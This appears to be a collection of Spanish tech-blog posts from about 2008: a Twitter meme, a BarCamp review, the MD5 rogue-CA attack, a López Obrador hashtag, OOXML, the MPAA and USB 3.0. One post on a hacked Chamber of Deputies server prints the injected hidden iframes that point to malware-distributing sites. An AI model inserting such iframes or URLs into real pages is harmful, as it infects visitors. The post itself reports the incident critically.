Todos estos comentarios, fueron creados por usuarios de Twitter con mucho tiempo libre e imaginación, con algunas joyas como esta:

Y para que no le digan, que no le cuenten, esta es la historia de como empezó este meme:

20 de Feb, pasada la media noche, tuiteo desde mi celular tras ver un infomercial de un partido político:

Masiosare: “@isopixel con López obrador no te hubieras enfermado”,

Y ese tuit, como muchos otros, paso casi sin pena ni gloria.

Mas tarde, aproximadamente 12 horas después de ese mismo día, @facso envia un tweet.

Facso: “Se me perdieron 5 pesos. Con López Obrador esto no me hubiera pasado.”

Platicando con el, me comentaba que espero al momento propicio para mandarlo, para que tuviera mas audiencia.

Minutos después, @kraken intenta robarse la autoría

Y en los próximos 5 minutos, entre @facso, @abitonix y @masiosare empezamos a intercambiar twitts. Ahí era indispensable empezar a identificar los tweets con un hashtag: #lopezobrador

Abitonix: @Facso Hoy justo al llegar al anden del metro, el vagón cerro las puertas. Con López Obrador esto no me hubiera pasado

Facso: @abitonix Con López Obrador las #pizzerolas no hubieran regresado.

Masiosare: @Facso Con lopez obrador, no le hubieran robado el dominio a @cvander #lopezobrador

Despues de eso solo fue necesario empujarlo un poquito mas…

Facso: #lopezobrador Con Lopez Obrador, nadie se metería entre tus piernas.

luisacoltzi: Con Lopez Obrador ya tendría Street Fighter IV #lopezobrador

Masiosare: Con lopez obrador, no habría bloggers copy and paste. Y hablarían ingles. #lopezobrador

aquilesbaeza: con lopez obrador no habría geeks virgenes en tuiter, ni divas calienta pollas #lopezobrador

Y se convirtió en una bola de nieve. A partir de ahí, hay en un lapso de 3 días de hoy cerca de 7-9 mil tweets y contando. Ademas @jhapik creó el PG Fail,

alguien creo el twitter de @lopezobrador,  y alguien (por favor, pasen el tip de quien fue para darle el justo crédito) creó la pagina http://lopez-obrador.info/ con algunas de las frases enviadas en twitter. Vamos ni las #pizzerolas tuvieron tanto arrastre.

EDIT: Me comenta @rafyta que el fue quien creo la pagina. Kudos para el

Para los curiosos y para la posteridad, aquí esta un pdf con algunos (porque twitter solo permite sacar los últimos 2000 tweets en las búsquedas) de los últimos tweets que participaron en este meme.

Y ya para cerrar las obligadas y “sesudas” conclusiones:

• El contenido sigue siendo el rey. Y el contenido de la comunidad, manda.
• Una vez que un meme esta en el aire, ya no es de quien lo creo. Le pertenece a quienes lo mantienen vivo.
• Twitter en mexico es una comunidad bastante mas grande de lo que imaginaba.
• Ojala usaramos esa “union” para un proposito mas productivo
• Como experimento de marketing viral es tema para estudio, sin embargo la comunidad solo participa cuando es interesante, asi que por favor, no intenten vender algo asi.

P.D. Si olvide algo, por favor, haganmelo saber, escribo un poco de memoria y otro poco con ayuda de la memoria de facso

En el animo de no repetir lo que otros blogueros seguro haran, resumire lo bueno y lo malo de este barcamp, similar a lo que hice con el primer google developer day,  con algunas anotaciones especiales y necesarias al final.

FAIL!

1. El internet fallo mucho en este barcamp. Uno tenia que estar brincando de una wireless a otra y solo habia dos. Se puede achacar a la gran cantidad de gente que estuvo ahi e hizo uso de ella. Para la otra necesitamos mas wireless! (wink wink telmex). Lo mismo con las conexiones electricas. Tenias que estarlas cazando.
2. El programa de eventos no se subio en linea hasta despues de la hora de la comida y nadie se entero. Todos se amontonaban en la entrada para ver que seguia.
3. El coffee break no tuvo cafe!
4. La conferencia de Adsdaq. Se llamo “como hacer dinero con tu blog”, y uno esperaba una discusion de las posibilidades existentes, comparativa de los productos en el mercado, maneras innovativas de monetizar, etc, y fue un comercial de 1 hora, sin nada innovador. Ese tiempo se pudo usar muy bien en otras conferencias que fueron cortadas, lo que me lleva a…
5. Talvez este sea problema del formato, pero las mejores conferencias se dieron al final y fueron las que menos tiempo tuvieron. Una lastima. Lo que me lleva a…
6. En muchas de las conferencias se corto el tiempo para preguntas y respuestas. La discusion es indispensable en estos espacios, sin embargo la falta de tiempo lo evito. Y esto me lleva a…
7. Gracias al exito de la convocatoria, hubo mucha gente con la intencion de presentar algo. Hicieron falta mas espacios y talvez falto organizarlos mejor. Esto bien podria categorizarse como un “WIN”.
8. Las fotos hasta ahora subidas a flickr y similares, estan protegidas, con derechos restrictivos, por lo que estas fotos no se pueden usar para ilustrar blogposts, cronicas, etc. Se supone que el barcamp tenia como eje central el “compartir”. Quiero pensar que esto es un error sin mala intencion que sera corregido proximamente.

WIN!

1. Antes que nada, la GENTE. Con mayusculas, puedo decir que lo mejor del barcamp fue la gente. Conoci y re-conoci gente terriblemente interesante, con un gran sentido de la comunidad, con mucho animo y buena vibra (y no de la de @mariano_osorio). La comunidad de IT en mexico tiene futuro, hoy mas que nunca.
2. La organizacion. Fue un evento masivo que requirio mucho trabajo por parte de la gente queretana (@netwalker, @cicloid y @_hyde. Si se me va alguien mas, avisenme!). Y se noto el esfuerzo. No falto comida, hotel e infraestructura. Bien!
3. Un punto especial para el proyecto Tlamashtilis. Es un software educativo enfocado a las comunidades nahuatl muy bien hecho y sobre todo muy bien presentado. Contiene documentos, diccionarios, opciones interactivas entre otros para facilitar el aprendizaje apoyandose en las nuevas tecnologias. El software esta desarrollado en flash y esta en fase beta. Tiene el apoyado por pedagogos, programadores (3), traductores y gente conocedora del tema de la educacion. Ya se encuentra en produccion en algunos lugares de la sierra norte y es un proyecto muy vivo. Si en algo les puedes ayuda, hacelo saber.
4. El rockband! Se instalo un rockband en una sala comun y fue un hit. Lo hubieran sacado mas temprano
5. El aftercamp. Despues del evento hubo una reunion en el bar “la selva”, donde las chelas brotaron alegremente. (gracias por el disco de Halo 3, por cierto)

Es de remarcarse el gran entusiasmo de los ponentes en las conferencias, que son programadores/diseñadores/publicistas/etc como tu y como yo que tenian algo que compartir. Muchos de ellos no eran comunicadores profesionales pero se veia la intencion devolver algo a la comunidad que al final de cuentas era la intencion de este BarCamp.

En el mismo barcamp se anunciaron algunos de los proximos eventos a los cuales les invito a que esten atentos, entre otros:

Cafe de altura, TweetMx (14 de marzo), Convencion de programadores de video juegos QRO (por definir), Flisol (26 de abril), Mexico Design (31 de agosto), Mexicoweb 2.0 y Wordcamp (18 de noviembre – Cancun)

Redondeando, puedo decir que este BarCamp fue todo un exito hecho por todos, con fuertes areas de oportunidad. Esperemos haya muchos mas.

En un trabajo realizado por diversos investigadores y presentado el dia de hoy, hace unos minutos. en la ” 25th Chaos Communication Congress”, investigadores de diversos lugares del mundo presentaron la conferencia “MD5 considered harmful today” en la cual presentaron un metodo mediante el cual pueden generar certificados CA validos, con lo cual podrian generar un certificado SSL para cualquier pagina, lo que implicaría que ninguna pagina HTTPS podría ser considerada como autentica o segura, lo cual afectaría seriamente a las actividades financieras por Internet.

El ataque, aunque no esta al alcance de todos, podría ser posible para ciertos laboratorios, gobiernos o criminales que controlen “botnets”.

Como dato curioso, los investigadores hicieron uso del Playstation3Lab, que les proporciono un cluster con mas de 200 PS3 interconectados actuando como una sola maquina.

Los usuarios ahora no pueden prevenir este ataque. La prevención de este ataque esta en manos de las autoridades certificadoras (CA) y si acaso, tal vez, del trabajo en conjunto de los creadores de navegadores. Sin embargo, una solución definitiva tomara tiempo, ya que se tendrían que reemplazar los certificados emitidos hasta el día de hoy que contengan las características vulnerables.

El papel apenas fue presentado el dia de hoy, hace algunos minutos y no se sabe aun de algun intento de explotarla en el pasado por algún otro investigador o criminal, aunque es improbable que esto sea, por la magnitud de esfuerzo necesaria para replicarla.

Puedes ver una prueba de concepto en:

https://i.broke.the.internet.and.all.i.got.was.this.t-shirt.phreedom.org/

Para verificarla tienes que poner la fecha de tu computadora anterior a agosto de 2004.
Hay mas información en la pagina de los investigadores: http://www.phreedom.org/research/rogue-ca/

Detalles técnicos, debajo de esta linea. Si no te interesan, puedes dejar de leer aqui.

Update:

Microsoft ya respondio a este aviso diciendo que no se conocen ataques a MD5, por lo que no se planea hacer nada. Y que como no hay exploit disponible, pues todo esta super. Dios nos agarre confesados.

Este ataque, mas concretamente, ataca la PKI (public key infraestructure), que es uno de los pilares de la confianza de los sitios seguros.

El problema se encontró en algunos CA los cuales generan certificados con MD5, encontrando colisiones en los hash generados. Gracias a esto ellos pudieron generar un certificado CA, con el cual se pueden generar certificados idénticos a los que usaría cualquier pagina que use HTTPS.

HTTPS y SSL funciona mediante una cadena de confianza. El root CA delega la confianza a los  CA intermedios y a su vez, los usuarios confían estos CA.  Dado que los navegadores comprueban la autenticidad de estos verificando contra los CA intermedios, el navegador no podría distinguir entre un certificado original y uno falso, ya que, en esencia, serian iguales.

diagrama del ataque

El peligro de esta vulnerabilidad es que se podría conjuntar con otras vulnerabilidades, como la anunciada por Dan Kaminsky[PDF] sobre el DNS poisoning, con lo cual se podría clonar cualquier pagina segura sin posibilidad de verificar si es segura o no. Ademas podría tener otras implicaciones no previstas, lo cual podremos ver, seguramente, en un futuro.

Como verificar si tu certificado es susceptible de ser vulnerable?

Entra pagina y ve los detalles del certificado. En la parte de algoritmo si hace mención a “MD5″, entonces si es vulnerable a este ataque.

Detalles del certificado - Algoritmo

Para detalles aún más técnicos, ve el papel original. El equipo de investigadores menciona que el papel aun no esta terminado, pero debera estar disponible en la primer mitad del proximo año.

Normalmente no suelo hablar de la AMIPCI ni de asociaciones similares, son tan relevantes como nuestros H. diputados, pero a veces no dejan opción

Y es que creo que los supuestos especialistas en internet, usualmente no tienen idea de lo que hablan. Y para muestra, unos cuantos de botones.

1.  En la pagina día de internet, son muy amables de proporcionarnos materiales promocionales para ponerlos en nuestro blog, con el siguiente texto de advertencia:

Todos los materiales(gráficos y contenidos) desarrollados con motivo del día de Internet por las Oficinas Técnicas y en particular los de esta web. Podrán ser utilizados de forma libre y gratuita siempre que contribuyan a difundir, impulsar y apoyar la iniciativa “Día de Internet”. De acuerdo con las normas que recoge esta licencia de Creative Commons.

Si ignoramos la pésima redacción, aseguran que los materiales son Creative Commons, pero no especifican el tipo de licencia (no comercial, atribución, no derivadas, licenciamiento recíproco), además que te solicitan que solo los uses SI vas a utilizar para hacerles publicidad. Lo cual va en contra de la esencia de CC. Por la “inocencia” de su petición, asumo que esta gente no lee muchos blogs , supongo que no querrán que su material aparezca en artículos como este. Por la redacción y contenido deduzco que ni siquiera se dieron tiempo de leer la pagina de creative commons para saber de que se trata el asunto.

2.  El día de internet es el 17 de mayo, pero la amipci lo celebra el 16. Porque? Estamos en México, porque no! Probablemente es porque el 17 es sábado, y  solo los burros trabajan el sábado, no?

3. El sitio Conéctate seguro es una invitación a la sociedad para que tomen precauciones para estar seguros al navegar en internet. Para este proposito el día de internet, se celebraran diversas actividades en este sentido. Solo hay un problema… el día de internet mas seguro (safer internet day) fue hace dos meses. Este es patrocinado por mas de 50 países a nivel mundial, impulsado principalmente en europa pero con participacion latinoamericana. Parece que nadie les aviso.

Comparen los eventos del safer internet day con el “conéctate seguro mexicano. Mientras en el safer Internet day habrá blogathones, participación en televisión, simulaciones de actividades de detectives cibernéticos, competencias en escuelas, etece, etece, etece… y en México tendremos una conferencia de una hora… con un psicologo de panelista!

4. Como se promocionará la campaña Conéctate seguro? en blogs, televisión, email, portales de Internet? Wrong! Se hará una campaña impresa para llegar a aquellos que no tienen Internet… Seriously, WTF?

5. Y ya para cerrar con broche de oro. La campaña Conéctate seguro habla de la seguridad en internet… pero la propia amipci debería aprender un poquito de seguridad. Sin indagar mucho, su buscador tiene un problema de seguridad grosero… Básicamente tiene cero validación, Vulnerable a XSS.

Aquí un par de imágenes para muestra

Con estos pequeños detallitos a mi me queda claro que la gente de la asociación mexicana de internet no tiene idea de lo que esta sucediendo a nivel mundial o nacional en el ámbito de la red. Se han quedado estancados en anunciar en donde pueden sus estadisticas de uso de internet pero estan obviando la parte importante, los contenidos.

Pero bueno, de eso nos encargamos nosotros, o no?

Sobre lo que a este blog atañe, las mejores empresas de tecnología en México son las siguientes:

Haciendo un analisis contra el año pasado encontramos que:

1. El año pasado encontrábamos 12 empresas de tecnología como los mejores lugares para trabajar, hoy solo encontramos 11
2. El año pasado la mejor colocada era Microsoft en el lugar 15. Hoy se encuentra en el lugar 35
3. Hoy la mejor empresa para trabajar en México en el ramo de tecnología se encuentra en el lugar 22, a comparación del lugar 15 del año anterior.
4. Softtek y otras empresas de los lugares mas bajos desaparecieron de la lista.
5. Los lugares superiores de la tabla siguen siendo los mismos, aunque en diferentes posiciones, es decir, las grandes siguen siendo grandes y las pequeñas no tienen visos de crecimiento. Los esfuerzos de las PyMEs no se están viendo reflejados en esta lista.

Este año no le fue tan bien en esta lista al sector de TI. Creo que erramos el camino, deberíamos estar sirviendo cafés en Starbucks y no pelándonos con usuarios y computadoras

La MPAA ha sido cuestionadisima en otros países por sus tácticas intimidatorias y abusivas, y comportamientos por lo menos hipócritas,  entre otras:

• Estar en contra de la neutralidad en la red (Net Neutrality) para poder revisar que hace cada persona con su conexión a Internet.
• Usar software pirata.
• Haciendo copias no autorizadas de películas.
• Inflar artificialmente las estadísticas de piratería para poder filtrar contenidos en universidades de los estados unidos. Además demandando a varias de ellas.
• Usar software libre sin seguir la licencia (de nuevo, usando software “pirata”)
• Contratar a un hacker para extraer información ilegalmente de otras compañías.
• Ser una de las principales promotoras del uso de esquemas draconianos de DRM.

Los autores de estas y muchas mas monerías, ahora son los que les vienen a vender espejitos a las compañías discográficas y productoras de películas de nuestro país.

En su comunicado de prensa, John Malcom, director de operaciones internacionales de la MPAA dijo que esta “demostrado” que los vendedores de piratería también son narcotraficantes, pornógrafos, vendedores de armas ilegales entre otras cosas. Creo que les falto decir que los piratas comen gatitos recién nacidos en el desayuno.

La van a tener difícil. México es el tercer lugar en el mundo en cuanto a piratería se refiere y hay datos de que 9 de cada 10 películas que se venden en el país, son piratas. Con todo y eso, México es 4º lugar entre los países con mas ganancias en taquilla de cines.

Así que podemos esperar ver que las campañas del miedo que había creado la AMPROFON en años pasados ahora se vean intensificadas y tomen un giro mas drástico.

Señalan que los primeros objetivos será contra las descargas “ilegales”, por lo que seguramente veremos campañas muy agresivas contra la compartición de archivos en Internet.

Titulo original de la entrada:
México se abstuvo en su voto para OOXML

La espera termino, y al final, con la ultima información que se tiene México conservo su voto de 2007 y se abstuvo de la votación sobre el ya tan llevado y traído asunto de establecer OOXML de Microsoft como estándar.

El voto depende directamente de la Secretaria de Economía, específicamente de la Dirección general de normas.

Que se requiere para que OOXML sea aprobado bajo estándar? Básicamente lo siguiente:

1. Dos terceras partes de los votos de los miembros participantes (es decir: 22 de los 32 posibles)
2. Y que no haya mas de una tercera parte del total de votos negativos ( es decir, 24 de 96 votos)

Como estamos al día de hoy?

22 de 32 votos en el criterio 1
14 de 69 votos en el criterio 2

Es decir, si todo se queda como estamos al día de hoy (que es lo mas probable), el OOXML pasaría a ser el estándar ISO 29500 y la diferencia seria de un solo voto.

Esperaremos las cifras oficiales, pero difícilmente serán diferentes a estas.

Días negros estos de marzo, sin duda….

Y es entendible, como dije en el post anterior sobre sistemas estándares,  una vez que tu ecosistema de sistemas cerrados empieza a crecer, los costos de manutención crecen, tanto por la complicada integración entre ellos, así como por el ya sabido problema de “vendor lock-in”, que te obliga a comprar soluciones a un solo proveedor.

La marina ya lo entendió. El apoyar el uso de sistemas abiertos, es cuestión de dinero.

Esta es otra historia diferente.

Después  leer la noticia del chamaco de 14 años, y de 5 minutos de investigación, encontré que la cámara de diputados tiene un servidor publico en el que muy alegremente distribuyen Malware.

Para los que lo quieran ver, y mientras dure, el servidor es este:

http://pac.diputados.gob.mx

Advertencia: Les recomiendo que visiten la pagina con firefox, noscript y antivirus instalado. O con Linux . De lo contrario podrían convertirse en zombies y un cachorro morirá. (La parte de los zombies es cierta )

La pagina tiene el siguiente código:

   1: <iframe src="http://www.bsupport.clara.net/cgi/" frameborder="0" width="0" height="0"></iframe>

   2: <iframe src="http://oscentolos.com/cgi/" frameborder="0" width="0" height="0"></iframe>

   3: <iframe src="http://thatsentertainmentinoz.com.au/log/" frameborder="0" width="0" height="0"></iframe>

   4: <iframe src="http://www.kawaart.com/cgi/" frameborder="0" width="0" height="0"></iframe>

   5: <iframe src="http://www.lindomar.com.br/cgi/index.html" frameborder="0" width="0" height="0"></iframe>

   6: <iframe src="http://www.youtube.com/watch?v=jTah9ckvV3Y" frameborder="0" width="0" height="0"></iframe>

   7: <iframe src="http://mavideniz1.org/forum/" frameborder="0" width="0" height="0"></iframe>

   8: <iframe src="http://siyamiozkan.com.tr/forum" frameborder="0" width="0" height="0"></iframe>

   9: <iframe src="http://mavi1.org/" frameborder="0" width="0" height="0"></iframe>

  10: <iframe src="http://mavideniz1.org/" frameborder="0" width="0" height="0"></iframe>

Algunos de esos sitios distribuyen malware.

Llama la atención que también hacen links a un vídeo de youtube. Al mostrar el vídeo queda claro quien fue el  responsable del deface. Al parecer el responsable fue iskorpitx un hacker turco que se hizo famoso tras un  incidente con miles de servidores.

Lo preocupante del asunto es que una vez que se tiene acceso a un servidor, se puede crear una reacción en cadena y tener acceso a los demás servidores de la red de la cámara de diputados. Y dada la laxa seguridad y control que tienen sobre su red, no dudaría que varios de estos servidores sean controlados por gente ajena a la administración.

Y tal vez este deface sea el menor de sus problemas, cuando su servidor DNS esta exponiendo toda la zona a quien quiera verla.  Es decir, con un simple comando en la consola tu puedes obtener la lista de todos sus servidores públicos.

Y ya ni hablar de que tienen una versión vieja (y vulnerable) de su software de acceso a su base de datos, visible para todo el publico (debo aceptar que cuando vi esto, mi palma dio una rapida visita a mi frente).

Es lamentable y preocupante como se lleva la política de administración de estos servidores. Mas preocupante aun cuando el responsable de esto asegura que su seguridad es “estable” y que el problema no existe.

Cuando se es incapaz de ver el problema, es imposible arreglarlo. Casos como estos se seguirán repitiendo. Todo, pagado por nuestros impuestos.

Estos son los detalles importantes de la presentacion:

1. USB 3.0 sera compatible con USB 1.1 y USB 2.0. Para esto se añadiran unos pines extras que estaran en la parte trasera del jack, y seran pines mas pequeños.
2. Tendra velocidades de hasta 4.7Gb/s
3. La especificacion deberia estar lista a mediados de este año
4. Se espera que este disponible comercialmente para 2009 o 2010.
5. Todavia no se sabe si tendra un nombre especial, como el USB 2.0 que fue HighSpeed. Ya se les estan acabando los nombres.